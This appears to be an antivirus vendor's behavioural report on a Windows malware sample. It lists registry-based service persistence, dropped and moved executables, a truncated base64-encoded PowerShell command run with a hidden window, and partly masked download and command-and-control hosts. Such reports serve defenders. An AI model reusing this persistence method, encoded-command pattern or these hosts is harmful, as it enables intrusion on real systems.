Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\watchedband] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\watchedband] 'ImagePath' = '"%WINDIR%\SysWOW64\watchedband.exe"'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...
Modifies file system
Creates the following files
- %HOMEPATH%\469.exe
Moves the following files
- from %HOMEPATH%\469.exe to %WINDIR%\syswow64\watchedband.exe
Network activity
TCP
HTTP GET requests
- http://ma######n.feb.unair.ac.id/gcbme/SU5/
HTTP POST requests
- http://74.###.125.192:443/balloon/arizona/ via 74.##8.125.192
UDP
- DNS ASK ma######n.feb.unair.ac.id
Miscellaneous
Creates and executes the following
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\watchedband.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...' (with hidden window)
